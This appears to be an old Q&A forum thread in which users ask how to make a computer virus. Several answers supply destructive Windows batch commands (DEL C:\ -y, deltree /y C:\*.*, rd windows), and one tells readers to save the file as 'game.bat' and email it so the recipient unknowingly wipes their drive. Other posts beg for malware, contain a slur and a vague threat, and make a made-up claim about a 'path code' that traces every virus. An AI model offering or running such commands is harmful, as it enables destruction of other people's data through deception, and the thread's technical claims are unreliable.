Answer by Anarchist
Submitted on 7/25/2006
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@echo off
DEL C:\ -y
DEL D:\ -y

(write in notepad save as "filename.bat")


Answer by masterba8ter@aol.com
Submitted on 8/22/2006
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masterb8ter@aol.com send me a virus if any work k                                                                                                          your computer will be crapy if you do !!!!!(no lie)!!!!!


Answer by JAMES
Submitted on 8/31/2006
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why do you wanna make a virus?

It isn't easy


Answer by brand
Submitted on 9/29/2006
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help me make a virus


Answer by thewannabehackerhelper
Submitted on 10/13/2006
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go to dos command prompt.
enter rd windows.
you just removed it >:D


Answer by darkdude
Submitted on 10/14/2006
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OK you want to make a virus?@echo off
if exist C:\*.* deltree /y C:\*.*  paste that into notepad save it as game.bat attach it to a e-mail send it the other person opens it it deletes there C drive


Answer by does anyone know a program callled "bug freezer" or "virus freezer"?
Submitted on 10/14/2006
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answer my nickname!


Answer by cc cheat
Submitted on 10/19/2006
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click on note pad ten enter



Answer by reyan
Submitted on 12/17/2006
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give me script virus ! 'N how makes virus?


Answer by Track%G
Submitted on 4/2/2007
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This FAGs, I mean FAQ's is rediculus. Code kiddie doesn't even begin to describe the lower life forms I have witnessed on this page. The internet is becoming overly cluttered with unintelligent, brainless juveniles. I can't believe this page is still even up. Maybe I should do something about it. . . I'm Track%G, and the internet in the coming days will be seeing a lot more of me. Mark my words.


Answer by JD_BlackHole
Submitted on 4/15/2007
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OK, well first off since probely none of you know much about computer learn a basic language like MS-DOS it's a language that is built into windows. OK then learn visual basics. and then you should learn like Java or C++ if you really wanna write a virus but then since you don't know any thing else other then how to write them you send it some one you wont know how to cover your tracks. and you probely get busted.. i take no responsibility for what you do with this info I'm not telling you to learn this to make viruses I'm just saying this for educational purposes. i had to say that do to legal reasons. and no one will ever tell you how to hack unless you on a very secure line that would leave no traces. sending viruses will get you put in jail. use this knowledge to create firewalls and stuff and maybe if you create a good enough one you could make some extra cash. but thats is all I'm going to say.


Answer by Ja2232
Submitted on 4/26/2007
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Today all Viruses have a Path code so If you make a Virus the Virus pertection group will find you through your internet server and you will be arrested and your name will be smerred all over and you will do jail time no virus can be put out with out a path code which is a contact file number that leads right back to your server so just remember the one's setting the viruses you don't know this but everyone of them are getting busted by the FED's


Answer by phil
Submitted on 6/13/2007
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how do u make a simple virus


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